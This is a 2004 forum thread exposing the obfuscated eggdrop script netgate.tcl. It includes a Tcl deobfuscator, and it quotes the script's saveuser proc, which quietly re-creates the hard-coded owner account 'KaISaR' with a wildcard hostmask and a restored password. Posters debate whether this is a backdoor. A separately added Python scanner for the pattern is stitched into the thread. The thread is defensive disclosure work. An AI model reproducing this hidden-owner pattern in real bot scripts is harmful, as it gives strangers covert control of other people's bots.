user

Joined: 18 Mar 2003 Posts: 1452 Location: Norway
|
Posted: Mon Jan 26, 2004 11:31 pm Post subject: netgate backdoor |
|
|
I checked the script mentioned here a bit closer...seems like it's got quite a few hidden "features" ...should I post a script that will "deobfuscate" it or are you guys like billy G...thinking that we should give people a fair chance to remove the script before making the "vuln" public?
The previously mentioned post is in the junk yard and will probably disappear pretty soon, so here's a direct link to the script just in case: http://www.rootshell.be/~netgate/netgate.tcl
EDIT: changed the subject _________________ Have you ever read "The Manual"?
Last edited by user on Thu Mar 22, 2007 11:21 am; edited 1 time in total |
Yourname Master

Joined: 24 Sep 2001 Posts: 358 Location: Toronto
|
Posted: Tue Jan 27, 2004 6:10 am Post subject: |
|
|
FULL-DISCLOSURE!
That script has for long, cheated many a user. I've tried to get most scripters to look into it, but due to time limitations and laziness, as we all know, they didn't wanna do it.
But you, my man, have accomplished something. Tell us. And provide us with a 'readable' format, if you can, and you're infamous! _________________ Dormant egghead. |
user

Joined: 18 Mar 2003 Posts: 1452 Location: Norway
|
Posted: Tue Jan 27, 2004 7:38 am Post subject: Here goes... |
|
|
This code will convert the script, so you need to have the original obfuscated version...
| Code: |
# Make http://www.rootshell.be/~netgate/netgate.tcl a bit easier to
# read (I didn't verify that it runs fine after the conversion, but
# who would want to run that sucky script anyway, right? :P)
#
# Usage: change the variables below before you source this script in
# your eggdrop. eggdrop is needed because parts of the descrambling is
# done using eggdrop's 'decrypt' command
set infile scripts/netgate.tcl
set outfile scripts/netgate.fixed.tcl

# The main (de)scrambler proc
# Escaping is honored for ['s but not the ], $ and space
# - Don't ask me why... I just reproduce the output of the original
proc lines str {
  # The part swapping L with 0 and 0 with L reminds me of my
  # first reaction when i saw the netgate.tcl code :P
  set map {
    a z z a b y y b c x x c d w w d e v v e f u u f g t
    t g h s s h i r r i j q q j k p p k l o o l m n n m
    A Z Z A B Y Y B C X X C D W W D E V V E F U U F G T
    T G H S S H I R R I J Q Q J K P P K L O O L M N N M
  }
  if {[regexp {[\$\[~]+} $str]} {
    set out ""
    set s ""
    set p "";# previous char
    foreach c [split $str ""] {
      if {$s==""} {
        if {$c=="~"} {
          set s ~
        } elseif {$c=="\$"} {
          set s " "; set c ~$c
        } elseif {$c=="\[" && $p!="\\"} {
          set s "\]"; set c ~$c
        } else {
          set c [string map $map $c]
        }
      } elseif {$c=="~"} {
        set s ""
      } elseif {$c==$s} {
        set s ""; append c ~
      }
      append out [set p $c]
    }
    if {$s==""} {set out} {append out ~}
  } {
    string map $map $str
  }
}

# Each of the three procs below returns the plain eggdrop command text
# (puthelp/putserv/putquick) with the descrambled string as its argument
proc puthlp str {
  set str "puthelp \"[string map {~ ""} [lines $str]]\""
}
proc putsrv str {
  set str "putserv \"[string map {~ ""} [lines $str]]\""
}
proc putqck str {
  set str "putquick \"[string map {~ ""} [lines $str]]\""
}

# dcp and dezip return the 'decrypt 64' result, escaped by qesc so it
# can be written back into the source
proc dcp str {
  set str \"[qesc [decrypt 64 $str]]\"
}
proc dezip str {
  if {[string match {*\\*} $str]} {set str [subst -noc -nov $str]}
  set str [qesc [decrypt 64 [string map {~ ""} $str]]]
}

# Backslash-escape Tcl special characters and write characters outside
# the printable ASCII range as octal escapes
proc qesc str {
  set out ""
  foreach c [split [string map {
    \\ \\\\ \[ \\\[ \] \\\] \{ \\\{
    \} \\\} \$ \\\$ \" \\\" " " "\\ "
  } $str] ""] {
    if {[set i [scan $c %c]]>31 && $i<127} {
      append out $c
    } {
      append out [format \\%.3o $i]
    }
  }
  set out
}

# Replace every complete call that begins with $cmdstart in the caller's
# variable $var with the text returned by the matching proc above
proc clearify {var cmdstart {stderr stdout}} {
  upvar 1 $var code
  set off [string len $cmdstart]
  set cmd [lindex [split $cmdstart " "] 0]
  set off2 [string match {\[*} $cmdstart]
  if {$off2} {
    set cmd [string range $cmd 1 end]
  }
  incr off2
  #puts $stderr "*** running \"$cmd\""
  set c 0
  foreach line [split [set code][set code ""] \n] {
    incr c
    set i 0
    set ll [string len $line]
    while {$i<$ll && [set i [string first $cmdstart $line $i]]>-1} {
      set j [expr {$i+$off+1}]
      while {$j<$ll && ![info complete [set run [string range $line $i $j]]]} {incr j}
      if {[info complete $run]} {
        # lame hack because this was the only command with more arguments :P
        if {$cmdstart=={[decrypt 64 "}} {
          set res [decrypt 64 [string range $run $off end-$off2]]
        } {
          set res [$cmd [string range $run $off end-$off2]]
        }
        set line [string replace $line $i $j $res]
      } {
        #puts $stderr "line#$c INCOMPLETE: \"$run\""
        break
      }
      incr i
    }
    append code "$line\n"
  }
  #puts $stderr "*** done: \"$cmd\""
}

# Re-indent the code according to brace nesting depth
proc indent {code {dent { }}} {
  set out ""
  set i 0
  foreach line [split $code \n] {
    set line [string trimleft $line]
    foreach {o c e} {0 0 0} break
    foreach a [split $line ""] {
      if {$e} {set e 0; continue}
      switch -exact -- $a {
        "\\" {set e 1}
        "\{" {incr o}
        "\}" {if {$o} {incr o -1} {incr c}}
      }
    }
    incr i -$c
    append out [string repeat $dent $i]$line\n
    incr i $o
  }
  set out
}

set code [read [set f [open $infile]]]; close $f
clearify code {[decrypt 64 "}
clearify code {[lines "}
clearify code {[dcp "}
clearify code {[dezip "}
clearify code {puthlp "}
clearify code {putsrv "}
clearify code {putqck "}
set f [open $outfile w]
puts $f [indent [set code]][unset code]
close $f
putlog "Check $outfile :)"
# It's a bit of a mess, but it does the job. Have fun :P |
_________________ Have you ever read "The Manual"?
Last edited by user on Tue Jan 27, 2004 11:59 pm; edited 2 times in total |
caesar Mint Rubber

Joined: 14 Oct 2001 Posts: 3741 Location: Mint Factory
|
Posted: Tue Jan 27, 2004 2:49 pm Post subject: |
|
|
duh! Why do you think I have moved it to the Junk Yard in the first place? Some untrustworthy users from Dalnet have created it so.. DON'T USE IT!
Also, thanks for the script to unscramble it  _________________ Once the game is over, the king and the pawn go back in the same box. |
Yourname Master

Joined: 24 Sep 2001 Posts: 358 Location: Toronto
|
Posted: Tue Jan 27, 2004 10:29 pm Post subject: |
|
|
heh, what's the use if it won't run? How to make it 'runnable' then?
caesar - I AM FROM TEH DALNET! _________________ Dormant egghead. |
user

Joined: 18 Mar 2003 Posts: 1452 Location: Norway
|
Posted: Tue Jan 27, 2004 11:43 pm Post subject: |
|
|
| Yourname wrote: | heh, what's the use if it won't run? How to make it 'runnable' then? |
I was talking about the converted script...it's for reading. Why would you want to run it? (changed my comment a bit in the top...do you get it now?) _________________ Have you ever read "The Manual"? |
caesar Mint Rubber

Joined: 14 Oct 2001 Posts: 3741 Location: Mint Factory
|
Posted: Wed Jan 28, 2004 11:04 am Post subject: |
|
|
I was talking about that netgate.tcl script.. also, I don't have something against Dalnet users, don't get me wrong there. The "untrustworthy" authors actually of that script are carders and probably (not sure 100% hackers). User's tcl is a neat thing to "unscramble" the code.. nice job.
PS: My apologies Yourname if I have let you the totally wrong impression that I have something against Dalnet users and my apologies if I have expressed myself wrong and let you under the impression that user's code is not good to run in order to make that "FULL-DISCLOSURE!" of the tricky code. _________________ Once the game is over, the king and the pawn go back in the same box. |
Yourname Master

Joined: 24 Sep 2001 Posts: 358 Location: Toronto
|
Posted: Wed Jan 28, 2004 2:35 pm Post subject: |
|
|
aww caesar, I'm just playin with you dude.
And yes, those people are prolly carders or so.
user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that [censored], I took it off apart from the fact that it scared me because I knew there are trojans here and there. _________________ Dormant egghead. |
user

Joined: 18 Mar 2003 Posts: 1452 Location: Norway
|
Posted: Wed Jan 28, 2004 2:44 pm Post subject: |
|
|
| Yourname wrote: | | user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there. |
I wouldn't copy stuff from their code. It is 100% pure crap. Seems like they spent all their skills trying to make it hard to read. If you have trouble coding a particular feature, it would be better to ask in the tcl forum on this site _________________ Have you ever read "The Manual"? |
caesar Mint Rubber

Joined: 14 Oct 2001 Posts: 3741 Location: Mint Factory
|
Posted: Wed Jan 28, 2004 3:37 pm Post subject: |
|
|
Yourname : aww.. you dirty dog. Shame on me cos I got so fooled.. _________________ Once the game is over, the king and the pawn go back in the same box. |
Yourname Master

Joined: 24 Sep 2001 Posts: 358 Location: Toronto
|
Posted: Thu Jan 29, 2004 3:43 am Post subject: |
|
|
I'll assume I'm a good actor.  _________________ Dormant egghead. |
NeTGaTE Voice
Joined: 03 Dec 2004 Posts: 5 Location: South Sumatera, Palembang - Indonesia
|
Posted: Fri Dec 03, 2004 11:56 pm Post subject: Reply |
|
|
user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there.
not trojan in this tcl buat dalnet have autoklines that script. dalnet read from tha NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname and two in away logo NETGATE (i Have fixed for this in 9.6)
The "untrustworthy" authors actually of that script are carders and probably (not sure 100% hackers).
tha authors nickname in DALnet is KaISaR, it's not a hackers.
:: odon |
user

Joined: 18 Mar 2003 Posts: 1452 Location: Norway
|
Posted: Sat Dec 04, 2004 1:48 am Post subject: Re: Reply |
|
|
| NeTgAtE wrote: | not trojan in this tcl buat dalnet have autoklines that script. dalnet read from tha NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname and two in away logo NETGATE (i Have fixed for this in 9.6)
tha authors nickname in DALnet is KaISaR, it's not a hackers. |
So this is not a backdoor? Is that what you're trying to say? (the code below is from v8.9)
| Code: |
set ps KaISaR
# the proc below is invoked alot...
proc saveuser {} {
  global ps owner
  if {![validuser $ps]} {
    setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq.";# Zfhjmnoptx
  } elseif {$owner != $ps} {
    setuser $owner XTRA "BEND" [zip [chattr $ps]]
    if {[passwdok $ps ""] != 1} {
      setuser $owner XTRA "LAST" [getuser $ps "PASS"]
    }
    deluser $ps
  }
  save
  if {![validuser $ps]} {
    adduser $ps "$ps!*@*"
    chattr $ps [dezip [getuser $owner XTRA "BEND"]]
    if {[getuser $owner XTRA "LAST"] != ""} {
      setuser $ps PASS [getuser $owner XTRA "LAST"]
    }
  }
  return 1
} |
_________________ Have you ever read "The Manual"? |
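
The pattern shown in `saveuser` above (a handle hard-coded in the script that is re-created with a wildcard hostmask and given flags decoded at run time) can be looked for statically when reviewing eggdrop scripts. The following Python scanner is an added example, not part of the thread or of netgate.tcl; `SAMPLE` is abridged from the snippet quoted above with a constructed `harmless` proc for contrast, and the function names are this example's own.

```python
import re

# Abridged from the saveuser proc quoted above (v8.9); 'harmless' is constructed.
SAMPLE = r'''set ps KaISaR
proc saveuser {} {
  global ps owner
  if {![validuser $ps]} {
    adduser $ps "$ps!*@*"
    chattr $ps [dezip [getuser $owner XTRA "BEND"]]
    setuser $ps PASS [getuser $owner XTRA "LAST"]
  }
}
proc harmless {nick} {
  chattr $nick +v
}
'''

# Eggdrop commands that create, remove or re-privilege a user record.
RULES = {"adduser": "creates an account", "chattr": "changes flags",
         "setuser": "rewrites a stored field", "deluser": "deletes an account"}
SET_RE = re.compile(r'^[ \t]*set[ \t]+(\w+)[ \t]+([A-Za-z]\w*)[ \t]*$', re.M)
CALL_RE = re.compile(r'\s*(adduser|chattr|setuser|deluser)\s+\$(\w+)\b(.*)')

def hardcoded_handles(src):
    """Variables assigned a bare-word literal, e.g. 'set ps KaISaR'."""
    return dict(SET_RE.findall(src))

def scan(src):
    """Return (line_no, command, handle, note); only calls that start a line are seen."""
    handles = hardcoded_handles(src)
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        m = CALL_RE.match(line)
        if not m or m.group(2) not in handles:
            continue  # handle comes from a parameter or the bot config, not a literal
        cmd, var, rest = m.groups()
        note = RULES[cmd]
        if cmd == "adduser" and "!*@*" in rest:
            note += " whose hostmask matches any host"
        elif cmd == "chattr" and "[" in rest:
            note += " to a value computed at run time"
        elif cmd == "setuser" and rest.split()[:1] == ["PASS"]:
            note += " (the password)"
        findings.append((no, cmd, handles[var], note))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Run it over the deobfuscated output rather than the original file, since the obfuscated script hides these calls behind its `decrypt 64` and `lines` wrappers.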
NeTGaTE Voice
Joined: 03 Dec 2004 Posts: 5 Location: South Sumatera, Palembang - Indonesia
|
Posted: Sat Dec 11, 2004 5:42 am Post subject: |
|
|
i think that is not a backdoor just a copyright who maker that tcl, just to remember who make netgate tcl is KaISaR (now he has been sign in from irc). some of user in dalnet have riped netgate tcl and make another tcl version with alot of logo/slogan but "STILL" same like netgate tcl.
$ps : Any one or people in dalnet always look this a backdoor, why? |
metroid Owner
Joined: 16 Jun 2004 Posts: 771
|
Posted: Sat Dec 11, 2004 6:14 am Post subject: |
|
|
You're a retard. That proc adds the author as an owner which is clearly a backdoor to get owner access on a bot.
Maybe you should try reading the code instead of making useless remarks Netgate. |